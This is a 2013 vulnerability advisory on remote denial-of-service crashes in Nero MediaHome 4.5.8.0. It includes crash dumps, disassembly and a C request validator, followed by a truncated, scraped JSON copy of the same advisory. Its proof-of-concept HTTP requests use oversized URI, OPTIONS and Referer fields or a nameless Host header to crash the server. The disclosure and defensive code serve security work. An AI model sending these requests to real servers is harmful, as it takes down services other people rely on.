Description
Advisory ID: HTB23130
Product: Nero MediaHome
Vendor: Nero
Vulnerable Version(s): 4.5.8.0 and probably prior
Tested Version: 4.5.8.0 in Windows 7 SP1
Vendor Notification: November 21, 2012
Public Disclosure: January 9, 2013
Vulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]
CVE References: CVE-2012-5876, CVE-2012-5877
CVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)
Risk Level: Low
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.
1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876
1.1 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP request at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.
Crash details:
EIP: 7c921689 mov ecx,[ecx]
EAX: 03b2a808 ( 62040072) -> (heap)
EBX: 003e0000 ( 4063232) -> b@>@>" (heap)
ECX: 00000000 ( 0) -> N/A
EDX: 00000000 ( 0) -> N/A
EDI: 03b2b000 ( 62042112) -> D (heap)
ESI: 03b2a800 ( 62040064) -> (heap)
EBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. (stack)
ESP: 0526f848 ( 86440008) -> >">&|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>. (stack)
+00: 003e0000 ( 4063232) -> b@>@>" (heap)
+04: 00000022 ( 34) -> N/A
+08: 003e0004 ( 4063236) -> b@>@>" (heap)
+0c: 0526f88c ( 86440076) -> &$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 ( 0) -> N/A
Disasm around:
0x7c921664 mov ecx,[ebp+0x10]
0x7c921667 add eax,[ecx]
0x7c921669 cmp eax,0xfe00
0x7c92166e ja 0x7c920721
0x7c921674 cmp byte [ebp+0x14],0x0
0x7c921678 jnz 0x7c95ae10
0x7c92167e mov ecx,[esi+0xc]
0x7c921681 lea eax,[esi+0x8]
0x7c921684 mov edx,[eax]
0x7c921686 mov [ebp+0x8],ecx
0x7c921689 mov ecx,[ecx]
0x7c92168b cmp ecx,[edx+0x4]
0x7c92168e mov [ebp+0xc],edx
0x7c921691 jnz 0x7c921734
0x7c921697 cmp ecx,eax
0x7c921699 jnz 0x7c921734
0x7c92169f push esi
0x7c9216a0 push ebx
0x7c9216a1 call 0x7c920684
0x7c9216a6 mov eax,[ebp+0xc]
0x7c9216a9 mov ecx,[ebp+0x8]
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
GET /[A * 500000] HTTP/1.1
HOST: somehost.com
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
1.2 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.
Crash details:
EIP: 7c921689 mov ecx,[ecx]
EAX: 03b63008 ( 62271496) -> (heap)
EBX: 003e0000 ( 4063232) -> # 8@>+ (heap)
ECX: 00000000 ( 0) -> N/A
EDX: 00000000 ( 0) -> N/A
EDI: 03b64000 ( 62275584) -> B (heap)
ESI: 03b63000 ( 62271488) -> (heap)
EBP: 0527f864 ( 86505572) -> '|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]| (stack)
ESP: 0527f858 ( 86505560) -> >!>'|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' | (stack)
+00: 003e0000 ( 4063232) -> # 8@>+ (heap)
+04: 00000021 ( 33) -> N/A
+08: 003e0004 ( 4063236) -> # 8@>+ (heap)
+0c: 0527f89c ( 86505628) -> '$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 ( 0) -> N/A
Disasm around:
0x7c921664 mov ecx,[ebp+0x10]
0x7c921667 add eax,[ecx]
0x7c921669 cmp eax,0xfe00
0x7c92166e ja 0x7c920721
0x7c921674 cmp byte [ebp+0x14],0x0
0x7c921678 jnz 0x7c95ae10
0x7c92167e mov ecx,[esi+0xc]
0x7c921681 lea eax,[esi+0x8]
0x7c921684 mov edx,[eax]
0x7c921686 mov [ebp+0x8],ecx
0x7c921689 mov ecx,[ecx]
0x7c92168b cmp ecx,[edx+0x4]
0x7c92168e mov [ebp+0xc],edx
0x7c921691 jnz 0x7c921734
0x7c921697 cmp ecx,eax
0x7c921699 jnz 0x7c921734
0x7c92169f push esi
0x7c9216a0 push ebx
0x7c9216a1 call 0x7c920684
0x7c9216a6 mov eax,[ebp+0xc]
0x7c9216a9 mov ecx,[ebp+0x8]
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
HEAD / [A * 265696] HTTP/1.1
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.
Crash details:
EIP: 7c920a1b cmp ecx,[edx+0x4]
EAX: 03c1bb90 ( 63028112) -> >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EBX: 003e0000 ( 4063232) -> @>+ (heap)
ECX: 03c1bb90 ( 63028112) -> >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EDX: 03b50101 ( 62193921) -> N/A
EDI: 03c1bb30 ( 63028016) -> yDPyDh8yDh >>#H"G^^^^o^I@_l (heap)
ESI: 03c1bb88 ( 63028104) -> >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EBP: 033bfc78 ( 54262904) -> L;L (stack)
ESP: 033bfc6c ( 54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack)
+00: 003e0000 ( 4063232) -> @>+ (heap)
+04: 03c1bb78 ( 63028088) -> >>#H"G^^^^o^I@_lhf19fPf36dLa (heap)
+08: 00000000 ( 0) -> N/A
+0c: 033bfd4c ( 54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack)
+10: 7c92084c (2089945164) -> N/A
+14: 03adb908 ( 61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)
Disasm around:
0x7c9209fe mov al,[esi+0x5]
0x7c920a01 and al,0x10
0x7c920a03 test al,0x10
0x7c920a05 mov [edi+0x5],al
0x7c920a08 jnz 0x7c920aa0
0x7c920a0e mov ecx,[esi+0xc]
0x7c920a11 lea eax,[esi+0x8]
0x7c920a14 mov edx,[eax]
0x7c920a16 mov [ebp+0xc],ecx
0x7c920a19 mov ecx,[ecx]
0x7c920a1b cmp ecx,[edx+0x4]
0x7c920a1e mov [ebp+0x14],edx
0x7c920a21 jnz 0x7c921752
0x7c920a27 cmp ecx,eax
0x7c920a29 jnz 0x7c921752
0x7c920a2f push esi
0x7c920a30 push ebx
0x7c920a31 call 0x7c920684
0x7c920a36 mov eax,[ebp+0x14]
0x7c920a39 mov ecx,[ebp+0xc]
0x7c920a3c cmp eax,ecx
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
OPTIONS / [A * 265712]
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Referer: http://www.host.com
1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted Referer header at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.
Crash details:
EIP: 7c920a19 mov ecx,[ecx]
EAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBX: 003e0000 ( 4063232) -> Tp@>+ (heap)
ECX: 41414141 (1094795585) -> N/A
EDX: 41414141 (1094795585) -> N/A
EDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)
ESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBP: 0527f828 ( 86505512) -> `' (stack)
ESP: 0527f81c ( 86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' | (stack)
+00: 003e0000 ( 4063232) -> Tp@>+ (heap)
+04: 00000021 ( 33) -> N/A
+08: 003e0004 ( 4063236) -> Tp@>+ (heap)
+0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' |>@'X`4' |`| (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)
Disasm around:
0x7c9209f8 jnz 0x7c95af5f
0x7c9209fe mov al,[esi+0x5]
0x7c920a01 and al,0x10
0x7c920a03 test al,0x10
0x7c920a05 mov [edi+0x5],al
0x7c920a08 jnz 0x7c920aa0
0x7c920a0e mov ecx,[esi+0xc]
0x7c920a11 lea eax,[esi+0x8]
0x7c920a14 mov edx,[eax]
0x7c920a16 mov [ebp+0xc],ecx
0x7c920a19 mov ecx,[ecx]
0x7c920a1b cmp ecx,[edx+0x4]
0x7c920a1e mov [ebp+0x14],edx
0x7c920a21 jnz 0x7c921752
0x7c920a27 cmp ecx,eax
0x7c920a29 jnz 0x7c921752
0x7c920a2f push esi
0x7c920a30 push ebx
0x7c920a31 call 0x7c920684
0x7c920a36 mov eax,[ebp+0x14]
0x7c920a39 mov ecx,[ebp+0xc]
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
GET / HTTP/1.1
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer:[A * 265566]
2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877
2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet with a missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving this malformed HTTP request.
Crash details:
EIP: 10003171 mov [eax+0x18],ebp
EAX: 00000000 ( 0) -> N/A
EBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)
ECX: 039cddea ( 60612074) -> localhost (heap)
EDX: 039cddea ( 60612074) -> localhost (heap)
EDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap)
ESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)
EBP: 00000009 ( 9) -> N/A
ESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)
+00: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)
+04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)
+08: 00000000 ( 0) -> N/A
+0c: 00000001 ( 1) -> N/A
+10: 000000b8 ( 184) -> N/A
+14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)
Disasm around:
0x10003156 mov edx,[esi+0x8]
0x10003159 mov ebp,[esi+0xc]
0x1000315c push byte 0x1
0x1000315e push eax
0x1000315f push ecx
0x10003160 push ebx
0x10003161 mov [edi+0x40],esi
0x10003164 mov [esp+0x2c],edx
0x10003168 call 0x10002730
0x1000316d mov ecx,[esp+0x2c]
0x10003171 mov [eax+0x18],ebp
0x10003174 mov ebp,[esp+0x24]
0x10003178 add esp,0x10
0x1000317b mov [eax+0x14],ecx
0x1000317e mov edx,[ebp+0x8]
0x10003181 test edx,edx
0x10003183 mov [esp+0x14],edx
0x10003187 jnz 0x10002ff0
0x1000318d mov eax,[esp+0x24]
0x10003191 push eax
0x10003192 call 0x10002c20
Proof of Concept:
The following HTTP request will crash Nero MediaHome server remotely:
GET / HTTP/1.1
: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.host.com
-----------------------------------------------------------------------------------------------
Solution:
Vendor last response (January 9, 2013):
"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon."
As a temporary solution it is advised to remove the vulnerable application from your system.
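The checks whose absence sections 1.1-1.4 and 2.1 describe, written out as an added C example (not code from Nero or from this advisory): a request-head validator that bounds the request line and every header line before any field is used, and rejects a header with an empty name or a request without Host. The 8192-byte limits, the 64-header cap, the mandatory Host rule and all function names are assumptions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Limits are assumptions of this example, not values taken from the product. */
#define MAX_REQUEST_LINE 8192
#define MAX_HEADER_LINE  8192
#define MAX_HEADERS      64

enum head_status {
    HEAD_OK, HEAD_INCOMPLETE, HEAD_LINE_TOO_LONG, HEAD_HEADER_TOO_LONG,
    HEAD_BAD_REQUEST_LINE, HEAD_MISSING_COLON, HEAD_EMPTY_HEADER_NAME,
    HEAD_TOO_MANY_HEADERS, HEAD_MISSING_HOST
};

/* Length of the line at p, excluding CRLF. Returns -1 once more than `limit`
 * bytes have been seen without a CRLF, -2 if the data ends first. The scan
 * never reads past `avail` and never copies anything. */
static long line_length(const char *p, size_t avail, size_t limit)
{
    for (size_t i = 0; i + 1 < avail; i++) {
        if (i > limit) return -1;
        if (p[i] == '\r' && p[i + 1] == '\n') return (long)i;
    }
    return avail > limit + 1 ? -1 : -2;
}

/* Case-insensitive comparison of a length-delimited header name. */
static int name_is(const char *p, size_t n, const char *want)
{
    if (strlen(want) != n) return 0;
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)p[i]) != tolower((unsigned char)want[i]))
            return 0;
    return 1;
}

/* Validate an HTTP request head held in buf[0..len). Every length is checked
 * against a fixed bound before the field is used. */
enum head_status check_request_head(const char *buf, size_t len)
{
    const char *p = buf, *end = buf + len;
    long n = line_length(p, len, MAX_REQUEST_LINE);
    if (n == -1) return HEAD_LINE_TOO_LONG;
    if (n == -2) return HEAD_INCOMPLETE;

    /* Request line: METHOD SP TARGET SP HTTP/x.y, with no empty field. */
    const char *eol = p + n;
    const char *sp1 = memchr(p, ' ', (size_t)n);
    if (!sp1 || sp1 == p) return HEAD_BAD_REQUEST_LINE;
    const char *sp2 = memchr(sp1 + 1, ' ', (size_t)(eol - (sp1 + 1)));
    if (!sp2 || sp2 == sp1 + 1) return HEAD_BAD_REQUEST_LINE;
    if (eol - (sp2 + 1) < 5 || memcmp(sp2 + 1, "HTTP/", 5) != 0)
        return HEAD_BAD_REQUEST_LINE;
    p = eol + 2;

    int host_seen = 0;
    for (int count = 0;; count++) {
        n = line_length(p, (size_t)(end - p), MAX_HEADER_LINE);
        if (n == -1) return HEAD_HEADER_TOO_LONG;
        if (n == -2) return HEAD_INCOMPLETE;
        if (n == 0) break;                       /* blank line ends the head */
        if (count >= MAX_HEADERS) return HEAD_TOO_MANY_HEADERS;
        const char *colon = memchr(p, ':', (size_t)n);
        if (!colon) return HEAD_MISSING_COLON;
        if (colon == p) return HEAD_EMPTY_HEADER_NAME;   /* ": value" line */
        if (name_is(p, (size_t)(colon - p), "Host")) host_seen = 1;
        p += n + 2;
    }
    return host_seen ? HEAD_OK : HEAD_MISSING_HOST;
}

/* Build before + pad*'A' + after in memory (constructed input) and check it. */
enum head_status check_padded(const char *before, size_t pad, const char *after)
{
    size_t b = strlen(before), a = strlen(after);
    char *buf = malloc(b + pad + a + 1);
    if (!buf) return HEAD_INCOMPLETE;
    memcpy(buf, before, b);
    memset(buf + b, 'A', pad);
    memcpy(buf + b + pad, after, a);
    enum head_status st = check_request_head(buf, b + pad + a);
    free(buf);
    return st;
}

int main(void)
{
    const char *tail = " HTTP/1.1\r\nHost: somehost.com\r\n\r\n";
    const char *no_name = "GET / HTTP/1.1\r\n: somehost.com\r\n\r\n";
    printf("normal request     -> %d\n", check_padded("GET /", 0, tail));
    printf("500000-byte URI    -> %d\n", check_padded("GET /", 500000, tail));
    printf("empty header name  -> %d\n",
           check_request_head(no_name, strlen(no_name)));
    return 0;
}
```

The validator works on a length-delimited buffer and returns a status instead of copying fields, so an over-long or malformed head is rejected before any fixed-size storage is involved.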
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23130 - https://www.htbridge.com/advisory/HTB23130 - Nero MediaHome Server Multiple Remote DoS vulnerabilities.
[2] Nero - http://www.nero.com - Nero MediaHome server easily distributes music, videos and photos over your network.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
(heap) \n+04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap) \n+08: 00000000 ( 0) -> N/A \n+0c: 00000001 ( 1) -> N/A \n+10: 000000b8 ( 184) -> N/A \n+14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap) \n**Disasm around:** \n0x10003156 mov edx,[esi+0x8] \n0x10003159 mov ebp,[esi+0xc] \n0x1000315c push byte 0x1 \n0x1000315e push eax \n0x1000315f push ecx \n0x10003160 push ebx \n0x10003161 mov [edi+0x40],esi \n0x10003164 mov [esp+0x2c],edx \n0x10003168 call 0x10002730 \n0x1000316d mov ecx,[esp+0x2c] \n0x10003171 mov [eax+0x18],ebp \n0x10003174 mov ebp,[esp+0x24] \n0x10003178 add esp,0x10 \n0x1000317b mov [eax+0x14],ecx \n0x1000317e mov edx,[ebp+0x8] \n0x10003181 test edx,edx \n0x10003183 mov [esp+0x14],edx \n0x10003187 jnz 0x10002ff0 \n0x1000318d mov eax,[esp+0x24] \n0x10003191 push eax \n0x10003192 call 0x10002c20 \n**Proof of Concept:** \nThe following HTTP request will crash Nero MediaHome server remotely: \nGET / HTTP/1.1 \n: somehost.com \nUser-Agent: Mozilla/5.0 (Windows; U) \nAccept-Language: en-us,en;q=0.5 \nKeep-Alive: 300 \nConnection: keep-alive \nReferer: http://www.host.com\n", "edition": 2, "published": "2012-11-21T00:00:00", "type": "htbridge", "title": "Nero MediaHome Multiple Remote DoS Vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5876", "CVE-2012-5877"], "modified": "2013-01-30T00:00:00", "id": "HTB23130", "href": 
"https://www.htbridge.com/advisory/HTB23130", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P/"}}], "zdt": [{"lastseen": "2018-01-04T17:03:02", "description": "Nero MediaHome version 4.5.8.0 suffers from multiple denial of service vulnerabilities due to improper handling issues.", "cvss3": {}, "published": "2013-01-10T00:00:00", "type": "zdt", "title": "Nero MediaHome 4.5.8.0 Denial Of Service Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-5876", "CVE-2012-5877"], "modified": "2013-01-10T00:00:00", "id": "1337DAY-ID-20143", "href": "https://0day.today/exploit/description/20143", "sourceData": "Product: Nero MediaHome\r\nVendor: Nero\r\nVulnerable Version(s): 4.5.8.0 and probably prior\r\nTested Version: 4.5.8.0 in Windows 7 SP1\r\nVendor Notification: November 21, 2012 \r\nPublic Disclosure: January 9, 2013 \r\nVulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]\r\nCVE References: CVE-2012-5876, CVE-2012-5877\r\nCVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)\r\nRisk Level: Low \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.\r\n\r\n\r\n1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876\r\n\r\n1.1 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. 
A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c921689 mov ecx,[ecx]\r\nEAX: 03b2a808 ( 62040072) -> (heap)\r\nEBX: 003e0000 ( 4063232) -> b@>@>\" (heap)\r\nECX: 00000000 ( 0) -> N/A\r\nEDX: 00000000 ( 0) -> N/A\r\nEDI: 03b2b000 ( 62042112) -> D (heap)\r\nESI: 03b2a800 ( 62040064) -> (heap)\r\nEBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. (stack)\r\nESP: 0526f848 ( 86440008) -> >\">&|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>. (stack)\r\n+00: 003e0000 ( 4063232) -> b@>@>\" (heap)\r\n+04: 00000022 ( 34) -> N/A\r\n+08: 003e0004 ( 4063236) -> b@>@>\" (heap)\r\n+0c: 0526f88c ( 86440076) -> &$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)\r\n+10: 7c928ccd (2089979085) -> N/A\r\n+14: 00000000 ( 0) -> N/A\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c921664 mov ecx,[ebp+0x10]\r\n 0x7c921667 add eax,[ecx]\r\n 0x7c921669 cmp eax,0xfe00\r\n 0x7c92166e ja 0x7c920721\r\n 0x7c921674 cmp byte [ebp+0x14],0x0\r\n 0x7c921678 jnz 0x7c95ae10\r\n 0x7c92167e mov ecx,[esi+0xc]\r\n 0x7c921681 lea eax,[esi+0x8]\r\n 0x7c921684 mov edx,[eax]\r\n 0x7c921686 mov [ebp+0x8],ecx\r\n 0x7c921689 mov ecx,[ecx]\r\n 0x7c92168b cmp ecx,[edx+0x4]\r\n 0x7c92168e mov [ebp+0xc],edx\r\n 0x7c921691 jnz 0x7c921734\r\n 0x7c921697 cmp ecx,eax\r\n 0x7c921699 jnz 0x7c921734\r\n 0x7c92169f push esi\r\n 0x7c9216a0 push ebx\r\n 0x7c9216a1 call 0x7c920684\r\n 0x7c9216a6 mov eax,[ebp+0xc]\r\n 0x7c9216a9 mov ecx,[ebp+0x8]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nGET /[A * 500000] HTTP/1.1\r\nHOST: somehost.com\r\nACCEPT: */*\r\nAccept-Encoding: None\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; 
Windows NT 5.0)\r\nConnection: Close\r\nAccept-Transfer-Encoding: None\r\n\r\n\r\n\r\n1.2 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c921689 mov ecx,[ecx]\r\nEAX: 03b63008 ( 62271496) -> (heap)\r\nEBX: 003e0000 ( 4063232) -> # 8@>+ (heap)\r\nECX: 00000000 ( 0) -> N/A\r\nEDX: 00000000 ( 0) -> N/A\r\nEDI: 03b64000 ( 62275584) -> B (heap)\r\nESI: 03b63000 ( 62271488) -> (heap)\r\nEBP: 0527f864 ( 86505572) -> '|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]| (stack)\r\nESP: 0527f858 ( 86505560) -> >!>'|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' | (stack)\r\n+00: 003e0000 ( 4063232) -> # 8@>+ (heap)\r\n+04: 00000021 ( 33) -> N/A\r\n+08: 003e0004 ( 4063236) -> # 8@>+ (heap)\r\n+0c: 0527f89c ( 86505628) -> '$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)\r\n+10: 7c928ccd (2089979085) -> N/A\r\n+14: 00000000 ( 0) -> N/A\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c921664 mov ecx,[ebp+0x10]\r\n 0x7c921667 add eax,[ecx]\r\n 0x7c921669 cmp eax,0xfe00\r\n 0x7c92166e ja 0x7c920721\r\n 0x7c921674 cmp byte [ebp+0x14],0x0\r\n 0x7c921678 jnz 0x7c95ae10\r\n 0x7c92167e mov ecx,[esi+0xc]\r\n 0x7c921681 lea eax,[esi+0x8]\r\n 0x7c921684 mov edx,[eax]\r\n 0x7c921686 mov [ebp+0x8],ecx\r\n 0x7c921689 mov ecx,[ecx]\r\n 0x7c92168b cmp ecx,[edx+0x4]\r\n 0x7c92168e mov [ebp+0xc],edx\r\n 0x7c921691 jnz 0x7c921734\r\n 0x7c921697 cmp ecx,eax\r\n 0x7c921699 jnz 0x7c921734\r\n 0x7c92169f push esi\r\n 0x7c9216a0 push ebx\r\n 0x7c9216a1 call 0x7c920684\r\n 0x7c9216a6 mov eax,[ebp+0xc]\r\n 0x7c9216a9 mov ecx,[ebp+0x8]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero 
MediaHome server remotely:\r\n\r\nHEAD / [A * 265696] HTTP/1.1\r\nACCEPT: */*\r\nAccept-Encoding: None\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\nConnection: Close\r\nAccept-Transfer-Encoding: None\r\n\r\n\r\n\r\n1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c920a1b cmp ecx,[edx+0x4]\r\nEAX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\r\nEBX: 003e0000 ( 4063232) -> @>+ (heap)\r\nECX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\r\nEDX: 03b50101 ( 62193921) -> N/A\r\nEDI: 03c1bb30 ( 63028016) -> yDPyDh8yDh >>#H\"G^^^^o^I@_l (heap)\r\nESI: 03c1bb88 ( 63028104) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\r\nEBP: 033bfc78 ( 54262904) -> L;L (stack)\r\nESP: 033bfc6c ( 54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack)\r\n+00: 003e0000 ( 4063232) -> @>+ (heap)\r\n+04: 